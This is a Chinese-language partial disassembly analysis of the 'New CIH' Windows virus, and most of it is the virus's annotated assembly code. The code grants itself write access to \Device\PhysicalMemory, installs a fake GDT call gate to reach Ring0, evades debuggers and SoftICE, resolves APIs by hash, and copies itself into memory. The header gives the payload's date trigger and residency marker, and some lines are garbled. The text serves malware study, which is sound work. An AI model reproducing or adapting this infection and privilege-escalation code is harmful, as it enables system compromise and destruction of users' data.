"新 CIH" 病毒的部分反汇编分析

;========================================================================

; Created by codez @2005.

; Date: 2005/06/19

; 转载请保留此信息，谢谢!

;========================================================================

; 说明:

; 抱歉，这里的分析并不完整，我会抽空补上。

;

; 欠缺注视部分为 Ring0 代码 (欠缺内容包括:进入Ring0 后的检查部分以及Ring0驻留部分)

; 原因: 这个东西在我的 Win2K Pro SP4 和 WinXP SP2 上面根本不能进入 Ring0,完全模拟分析太费事:(

;

; 一些有用的部分:

; 1. 病毒判断自身是否驻留内存的标志: if (dr0 == 0x474E4159) goto has_in_memory;

; 2. 病毒发作条件:

; mov ax, 1016h

; out 70h, al

; in al, 71h

; xchg ah, al

; out 70h, al

; in al, 71h

;

; xor ax, 926h ; 这个发作条件太苛刻了，几乎没有电脑能够触发它！

; jnz do_not_trigger ; 真不知道为什么瑞星要把它的等级定的那么高!!!

;

;=========================================================================

; 其他:

; 由于 codez 水平有限，分析也比较匆忙 (大概花了两个晚上的时间)，另外还有一些东西也是初次接触，

; 如果有任何错误，请发信通知我！不胜感激!

;=========================================================================

; 警告:

; 本文仅供学习研究之用，任何人不得将其用于非法用途，对于任何与之相关所带来的后果均由使用者

; 承担。

;=========================================================================

block2_addr dd 5683Ah ; 45683A 这里指向 block2 (block2 包含破坏代码)

block1_len dd 93Dh

; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹

public start

start proc near

call $+5

pop ebp

add ebp, 376h ; ebp = 453A3E

lea edi, [ebp-8] ; edi = 453A36

nop

mov ebx, [esp+0] ; Fetch data: dword ptr [esp] -> pointer to Kernel32 hModule

cmp ebx, 80000000h ; Do not run on Win9X system.

ja go_run_host

============================

mov ebx, 77E00000h ; ugly code, but can be work!

call seek_module_and_apis ; ;===========================================

; ; input:

; ; edi -> HMODULE Name

; ; ebx -> HMODULE fuzzy addr in memory

; ;===========================================

lea eax, [ebp-143h]

push eax ; seh error handler: 4538FB

xor eax, eax

push dword ptr fs:[eax]

mov fs:[eax], esp

call Load_apis

push 4

push 1000h

push 17A8h

nop

push 0

call dword ptr [ebp+20h] ; VirtualAlloc

nop

or eax, eax

jz go_run_host

cld

lea esi, [ebp-37Bh] ; esi - 004536C3 (virus start addr)

mov edi, eax

mov edx, ebp

sub edx, [ebp-14Fh] ; edx = 400000 (hModule)

sub esi, edx

loop_move_virus: ; CODE XREF: start+7Ej

add esi, edx

movzx ecx, word ptr [esi-4] ; 93D

push esi

rep movsb ; move virus body to new memory alloced

pop esi

mov esi, [esi-8]

or esi, esi

jnz short loop_move_virus

mov [ebp+0E2h], eax ; [453B20] = hMemAlloced

lea edx, [ebp-57h] ; 004539E7 (unicode: \Device\PhysicalMemory)

nop

lea edi, [ebp-20h] ; [453A1E]

nop

mov [ebp-5Bh], edx ; [4539E3] = edx

nop

and di, 0FFFCh ; 00453A1C

push edi

push 18h

pop ecx

push ecx

xor eax, eax

rep stosb ; clear memory

pop ecx

pop edi

mov esi, edi

mov [edi], eax

mov [esi], ecx ; OBJECT_ATTRIBUTES.Length = 0x18

; OBJECT_ATTRIBUTES.RootDirectory = 0

add edi, 8

lea eax, [edx-8]

mov [edi], eax ; OBJECT_ATTRIBUTES.ObjectName = \Device\PhysicalMemory

mov dword ptr [edi+4], 240h ; OBJECT_ATTRIBUTES.Attributes = 0x240

; other members for OBJECT_ATTRIBUTES are 0

push esi

push 6 ; #define SECTION_MAP_WRITE 0x0002

; #define SECTION_MAP_READ 0x0004

lea edi, [ebp+10h] ; HANDLE - 00453A4E

nop

push edi

;# COPY FROM: WDM.H

;NTSTATUS

; ZwOpenSection(

; OUT PHANDLE SectionHandle,

; IN ACCESS_MASK DesiredAccess,

; IN POBJECT_ATTRIBUTES ObjectAttributes

; );

;#COPY FROM: NTDEF.H

;typedef struct _OBJECT_ATTRIBUTES32 {

; ULONG Length;

; ULONG RootDirectory;

; ULONG ObjectName;

; ULONG Attributes;

; ULONG SecurityDescriptor;

; ULONG SecurityQualityOfService;

;} OBJECT_ATTRIBUTES32;

call dword ptr [ebp+3Ah] ; ZwOpenSection

nop

or eax, eax

jz ok_USE_GDT_enter_ring0 ; 453A1B

push esi

;=======================================

;#define MEM_PRIVATE 0x20000

;#define MEM_MAPPED 0x40000

;=======================================

push 60000h

push edi

call dword ptr [ebp+3Ah] ; ZwOpenSection

nop

push esi

xor ebx, ebx

push ebx

mov eax, esp

push ebx

mov esi, esp

push eax

push ebx

push esi

push ebx

push 4

push 6

push dword ptr [edi]

call dword ptr [ebp+52h] ; GetSecurityInfo

nop ; al = 6 ?

nop

push 20h

pop ecx

lea edi, [ebp+12Eh] ; 00453B6C

push edi

xor bl, bl

rep stosb

pop edi

inc bl

mov byte ptr [edi], 2

mov [edi+4], bl

mov [edi+14h], bl

mov [edi+18h], bl

call push_string

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

aYangmin db 'YANGMIN',0

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

push_string: ; CODE XREF: start+118p

pop dword ptr [edi+1Ch]

push ecx

push esp

start endp

push dword ptr [esi]

push edi

push 1

call dword ptr [ebp+5Ah] ; SetEntriesInAclA

nop

xor ebx, ebx

mov eax, [esp]

push ebx

push eax

push ebx

push 4

push 6

mov edi, [ebp+10h]

nop

push edi

call dword ptr [ebp+56h] ; SetSecurityInfo

nop

push edi

call dword ptr [ebp+3Eh] ; ZwClose

nop

add esp, 0Ch

push 6

lea edi, [ebp+10h]

nop

push edi

call dword ptr [ebp+3Ah] ; ZwOpenSection

nop

or eax, eax

jnz go_run_host

ok_USE_GDT_enter_ring0: ; CODE XREF: start+CEj

lea ecx, [ebp-23h] ; 453A1B

nop

sgdt qword ptr [ecx] ; get gdtr info

inc dword ptr [ecx] ; gdtr limit + 1

movzx edi, word ptr [ecx] ; edi = gdt length

mov ebx, edi

mov edx, [ecx+2] ; edx = gdt base (the value often is 0x80036000)

cmp edx, 80000000h

jb loc_4538D9 ; 453A4E

cmp edx, 0A0000000h

ja short loc_4538D9 ; 453A4E

nop

and edx, 1FFFF000h ; maybe 36000

push edi

push edx

push 0

push 6

push dword ptr [ebp+10h] ; ZwOpenSection HANDLE returned (453A4E)

nop

call dword ptr [ebp+24h] ; MapViewOfFile (453A62)

===================================

NOW! Return value: eax - gdt table

===================================

nop

or eax, eax

jz short loc_4538D9 ; 453A4E

nop

mov ecx, edi

shr ecx, 3 ; gdt_item_max_count = gdt_table_len / 8

dec ecx ; max_index_value

dec ebx

and bl, 0F8h ; last gdt item offset in the gdt table

lea edi, [eax+ebx] ; last gdt item addr in mem

loc_45388B: ; CODE XREF: .text:00453892j

sub edi, 8

test byte ptr [edi+5], 0Fh

loopne loc_45388B

jnz short loc_4538D9 ; 453A4E

==================================

NOW! EDI - is a reserved gdt item

==================================

nop

add edi, 8 ; the next gdt item for using

lea edx, [ebp+5Eh] ; enter Ring0 with GDT way (call to 453A9C)

nop

lea esi, [ebp-2Bh] ; VIRUS APPEND FAKE CALL GATE : 453A13

nop

====================================

FILL OFFSET FOR VIRUS CALL GATE

====================================

mov [esi], dx

shr edx, 10h

mov [esi+6], dx

====================================

push edi

mov ecx, 2

rep movsd ; insert virus fake gate into gdt

pop edi

mov edx, edi

sub edx, eax

or dl, 3 ; selector for call (edi = index<<3+3)

lea eax, [ebp+0Ch] ; 453A4A

nop

mov [eax+4], dx ; [453A4E] = DX

push eax

push 26h

call dword ptr [ebp+28h] ; Sleep (); //453A66

nop

pop eax

call fword ptr [eax] ; enter Ring0 Game

loc_4538D9: ; CODE XREF: .text:0045384Cj

; .text:00453858j .text:00453878j

; .text:00453894j

push dword ptr [ebp+10h] ; 453A4E

nop

call dword ptr [ebp+3Eh] ; ZwClose 453A7C

nop

xor eax, eax

pop dword ptr fs:[eax] ; remove virus seh handler

add esp, 8

go_run_host: ; CODE XREF: start+1Bj start+56j

; .text:0045382Dj Load_apis+Dj

; Load_apis+24j .text:00453950j

; push_call_module_2+8j

sub ebp, 53A3Eh

add ebp, 3F491h ; Original RVA = 3F491 (EPO = 43F491)

push ebp

retn

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

seh_handler2:

call $+5

pop eax

lea eax, [eax-13h]

push eax

mov eax, [esp+10h]

pop dword ptr [eax+0B8h]

xor eax, eax

retn

; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹

Load_apis proc near ; CODE XREF: start+3Ap

pusha

pushf

mov eax, [ebp-64h]

nop

cmp eax, 77E60000h

jnz short go_run_host

call dword ptr [ebp+14h] ; IsDebuggerPresent

nop

or eax, eax

jnz short loc_453934 ; jmp is debugger detected!

; clear eax if your debugger was detected!

nop

call check_softice_in_memory

loc_453934: ; CODE XREF: Load_apis+17j

or eax, eax

jnz short go_run_host

popf

popa

call push_module_name ; LoadLibrary

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

aAdvapi32 db 'advapi32',0

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

push_module_name: ; CODE XREF: Load_apis+28p

call dword ptr [ebp+10h] ; LoadLibrary

nop

or eax, eax

Load_apis endp

jz short go_run_host

mov ebx, eax

lea edi, [ebp+42h] ; 453a80

nop

call seek_module_and_apis ; ;===========================================

; ; input:

; ; edi -> HMODULE Name

; ; ebx -> HMODULE fuzzy addr in memory

; ;===========================================

call push_call_module_2

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

aNtdll db 'ntdll',0

; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹

push_call_module_2 proc near ; CODE XREF: .text:0045395Fp

call dword ptr [ebp+10h]

nop

or eax, eax

jz go_run_host

mov ebx, eax

lea edi, [ebp+2Ch]

nop

call seek_module_and_apis ; ;===========================================

; ; input:

; ; edi -> HMODULE Name

; ; ebx -> HMODULE fuzzy addr in memory

; ;===========================================

retn

push_call_module_2 endp

; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹

check_softice_in_memory proc near ; CODE XREF: Load_apis+1Dp

xor eax, eax

push eax

push 80h

push 3

push eax

inc eax

push eax

add eax, 0Bh

push eax

call push_ntice_string

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

a_Ntice db '\\.\NTICE',0

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

push_ntice_string: ; CODE XREF: check_softice_in_memory+11p

call dword ptr [ebp+18h]

check_softice_in_memory endp

nop

inc eax

jnz short loc_4539BE

nop

dec eax

push eax

call dword ptr [ebp+1Ch] ; CloseHandle

nop

xor eax, eax

retn

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

loc_4539BE: ; CODE XREF: .text:004539ADj

mov eax, 2

retn

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

add [ecx+4Dh], bl

and [ebx+49h], cl

dec esp

and [ecx+4Fh], bl

push ebp

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

db 0 ;

db 1 ;

db 0 ;

hKernel32 dd 80400000h

db 90h ;

db 2Ch ; ,

db 0 ;

db 2Eh ; .

db 0 ;

db 32h ; 2

db 46h ; F

db 44h ; D

db 0 ;

db 5Ch ; \ ; unicode: \Device\PhysicalMemory

db 0 ;

db 44h ; D

db 0 ;

db 65h ; e

db 0 ;

db 76h ; v

db 0 ;

db 69h ; i

db 0 ;

db 63h ; c

db 0 ;

db 65h ; e

db 0 ;

db 5Ch ; db 0 ;

db 50h ; P

db 0 ;

db 68h ; h

db 0 ;

db 79h ; y

db 0 ;

db 73h ; s

db 0 ;

db 69h ; i

db 0 ;

db 63h ; c

db 0 ;

db 61h ; a

db 0 ;

db 6Ch ; l

db 0 ;

db 4Dh ; M

db 0 ;

db 65h ; e

db 0 ;

db 6Dh ; m

db 0 ;

db 6Fh ; o

db 0 ;

db 72h ; r

db 0 ;

db 79h ; y

db 0 ;

===================================

VIRUS APPEND FAKE CALL GATE

===================================

dw 46E7h ; OFFSET LOWORD

dw 8 ; SELECTOR

db 0 ; COUNT

db 0ECh ; P:1; DPL:3; DT:0(SYS/GATE); TYPE:C(386 CALL GATE);

dw 44h ; OFFSET HIWORD

==================================

db 0 ;

db 4 ;

db 0 ;

db 60h ; `

db 3 ;

db 80h ; €

db 0 ;

db 2Ah ; *

db 46h ; F

db 44h ; D

db 0 ;

db 40h ; @

db 2 ;

db 0 ;

============================

db 4Bh ; K

db 45h ; E

db 52h ; R

db 4Eh ; N

db 45h ; E

db 4Ch ; L

db 33h ; 3

db 32h ; 2

============================

kernel32_api_hash_code_table

============================

dw 0F3D5h

dw 1336h

dw 8406h

dw 4873h

dw 0C6C7h

dw 66F4h

dw 837Fh

-------------------------

dw 0 ; separator

=============================

KERNEL32.DLL

=============================

addr_LoadLibraryA dd 6C8h ; later, the dword will be used for

; storing HANDLE of ZwOpenSection

addr_IsDebuggerPresent dd 77E6171Dh

addr_CreateFileA dd 77E6B66Dh

addr_CloseHandle dd 77E676F6h

addr_VirtualAlloc dd 77E67F50h

addr_MapViewOfFile dd 77E6D2D7h

addr_Sleep dd 77E675E0h

=========================

db 6Eh ; n

db 74h ; t

db 64h ; d

db 6Ch ; l

db 2Eh ; .

db 64h ; d

db 6Ch ; l

=======================

dw 0F092h

dw 0BCC8h

dw 0

ZwOpenSection dd 77F86AD5h

ZwClose dd 77F83763h

==============================

db 41h ; A

db 44h ; D

db 56h ; V

db 41h ; A

db 50h ; P

db 49h ; I

db 33h ; 3

db 32h ; 2

==============================

dw 6313h

dw 0DEA4h

dw 39A9h

dw 0

addr_GetSecurityInfo dd 77DC1B02h

addr_SetSecurityInfo dd 77DC1BA3h

addr_SetEntriesInAclA dd 77D92DB6h

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

==============================

VIRUS_RING0_GAME:

pusha

pushf

cli

call $+5

pop ebp ; ebp = 453AA4

lea edi, [ebp+0A8h] ; 453B4C: "ntoskrnl"

xor edx, edx

mov ebx, 80400000h

mov [edi+20h], edx

nop

call seek_module_and_apis ; ;===========================================

; ; input:

; ; edi -> HMODULE Name

; ; ebx -> HMODULE fuzzy addr in memory

; ;===========================================

cmp [edi+20h], edx

nop

jz loc_453B49

cld

mov edx, [edi+24h]

nop

mov edx, [edx+1]

mov eax, [edi+20h]

nop

mov eax, [eax]

mov edi, [eax+edx*4]

mov ecx, [ebp+7Ch]

nop

mov [ecx+5EBh], edi

mov byte ptr [ecx+5FFh], 0

mov ecx, dr0

cmp ecx, 474E4159h ; mask in memory?

jz short loc_453B49

nop

lea edi, [eax+edx*4]

push 4D59h

push 30BEh

nop

push 0

call dword ptr [ebp+0D8h] ; maybe alloc a memory

or eax, eax

jz short loc_453B49

nop

push edi

mov esi, 990000h

push esi

mov edi, esi

lea esi, [ebp-3E1h] ; 4536C3

mov ecx, 5EAh

nop

rep movsb

pop esi

mov edi, eax

push 0BD4h

nop

pop ecx

rep movsb

pop edi

add eax, 5EAh

mov [edi], eax

loc_453B49: ; CODE XREF: .text:00453AC3j

; .text:00453AFAj .text:00453B18j

popf

popa

retf

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

db 6Eh ; n ; ntoskrnl

db 74h ; t

db 6Fh ; o

db 73h ; s

db 6Bh ; k

db 72h ; r

db 6Eh ; n

db 6Ch ; l

dw 927Eh

dw 75D8h

dw 0B063h

dw 9B3Ah

dw 0C12Eh

dw 90F8h

dw 5B5Ah

dw 0F72Eh

dw 70EAh

dw 2B7Ah

dw 0BCC8h

dw 0

dd 8046D7A0h

dd 80400A06h

dd 8040120Ah

dd 804016C6h

dd 8046A6C0h

dd 804A81C6h

dd 804554E5h

dd 8042D8A4h

dd 8040141Ah

dd 8040101Ah

dd 80400986h

dd 0

; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹

; ;===========================================

; ; input:

; ; edi -> HMODULE Name

; ; ebx -> HMODULE fuzzy addr in memory

; ;===========================================

seek_module_and_apis proc near ; CODE XREF: start+26p .text:0045395Ap

; push_call_module_2+16p

; .text:00453AB8p

pusha

pushf

call $+5

pop ebp ; EBP = 453BA3

push ebp

lea eax, [ebp+6Ch] ; seh handler for error: 453C0F

nop

push eax

xor ecx, ecx

push dword ptr fs:[ecx]

mov fs:[ecx], esp ; __try

sub ebx, 10000h

loop_to_seek_pe_module: ; CODE XREF: seek_module_and_apis+31j

; seek_module_and_apis+3Dj

; seek_module_and_apis+53j

; seek_module_and_apis+5Bj

add ebx, 10000h ; ebx = 77E00000h

cmp ebx, 80500000h

ja short hKernel32_found_end

cmp word ptr [ebx], 5A4Dh ; MZ

jnz short loop_to_seek_pe_module

mov eax, [ebx+3Ch]

add eax, ebx

cmp word ptr [eax], 4550h ; PE

jnz short loop_to_seek_pe_module

;==================================

; out:

; eax - PE header pointer

; ebx - hKernel32 (if correct)

;==================================

mov [ebp-1C9h], ebx ; [4539DA] = hKernel32

mov eax, [eax+78h]

add eax, ebx ; eax - Export table rva

mov edx, [eax+0Ch]

add edx, ebx ; edx = DLL Module Name rva

mov ecx, [edi] ; edi -> KERNEL32

;check pe_file_export_name == 'KERNEL32'?

cmp [edx], ecx

jnz short loop_to_seek_pe_module

mov ecx, [edi+4]

cmp [edx+4], ecx

jnz short loop_to_seek_pe_module

;===============================

; out:

; eax - export table rva

; ebx - hKernel32

;===============================

hKernel32_found_end: ; CODE XREF: seek_module_and_apis+2Aj

xor ecx, ecx

pop dword ptr fs:[ecx]

pop esi

pop esi ; esi = 453BA3

; edi = 453A36

add edi, 8 ; edi = 453A3E

;=======================================

; if hKernel32 found, ebx is hInstance,

; else ebx is NULL.

;=======================================

or ebx, ebx

jz short loc_453C0C

call seek_all_api ; input:

; ecx = 0

; esi = 453BA3

; edi = 453A3E

loc_453C0C: ; CODE XREF: seek_module_and_apis+69j

popf

popa

retn

seek_module_and_apis endp

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

seh_handler:

call $+5

pop eax

lea eax, [eax-5Ah]

push eax

mov eax, [esp+10h]

pop dword ptr [eax+0B8h]

xor eax, eax

retn

; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹

; input:

; ecx = 0

; esi = 453BA3

; edi = 453A3E

seek_all_api proc near ; CODE XREF: seek_module_and_apis+6Bp

var_4 = dword ptr -4

cld

dec ecx ; ecx = 0xffffffff

push eax

xor eax, eax

repne scasw

not ecx

dec ecx

push ecx ; length

push edi ; 453A4E

rep stosd ; ZeroMemory

pop edi

sub edi, 4

pop ecx

pop eax

eax - export rva table

mov esi, [eax+20h] ; Export function name directory rva

add esi, ebx

mov esi, [esi]

add esi, ebx

xor edx, edx

push ecx

loc_453C47: ; CODE XREF: seek_all_api+5Aj

push ecx

loc_453C48: ; CODE XREF: seek_all_api+3Bj

cmp edx, [eax+18h]

pop ecx

jz short loc_453C82

push ecx

inc edx

push eax

call creat_hash_code_for_api_name ;

; =================================

; input:

; esi - api name

; output:

; eax - hash code for the api

; =================================

push edi ; edi - 453a4a

std

mov ecx, [esp+10h+var_4]

repne scasw ; only match low word hash code

pop edi

pop eax

jnz short loc_453C48

push edx

dec edx

push edi

mov edi, [eax+24h]

add edi, ebx

movzx edx, word ptr [edi+edx*2]

mov edi, [eax+1Ch]

add edi, ebx

mov edx, [edi+edx*4]

add edx, ebx

pop edi

mov [edi+ecx*4+4], edx

pop edx

pop ecx

loop loc_453C47

loc_453C82: ; CODE XREF: seek_all_api+26j

pop ecx

retn

seek_all_api endp

; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹

;

; =================================

; input:

; esi - api name

; output:

; eax - hash code for the api

; =================================

creat_hash_code_for_api_name proc near ; CODE XREF: seek_all_api+2Bp

push edx

push 0FFFFFFFFh

pop edx

cld

loc_453C89: ; CODE XREF: creat_hash_code_for_api_name+24j

lodsb

or al, al

jz short loc_453CAA

nop

xor dl, al

mov al, 8

loc_453C96: ; CODE XREF: creat_hash_code_for_api_name+22j

shr edx, 1

jnb short loc_453CA4

nop

xor edx, 59414E47h

loc_453CA4: ; CODE XREF: creat_hash_code_for_api_name+14j

dec al

jnz short loc_453C96

jmp short loc_453C89

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

loc_453CAA: ; CODE XREF: creat_hash_code_for_api_name+8j

xchg eax, edx

pop edx

retn

creat_hash_code_for_api_name endp

&quot;新 CIH&quot; 病毒的部分反汇编分析

"新 CIH" 病毒的部分反汇编分析